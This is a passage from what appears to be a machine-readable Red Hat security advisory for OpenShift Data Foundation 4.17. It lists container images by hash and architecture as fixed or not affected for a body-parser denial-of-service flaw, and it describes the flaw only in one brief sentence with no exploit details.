"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", 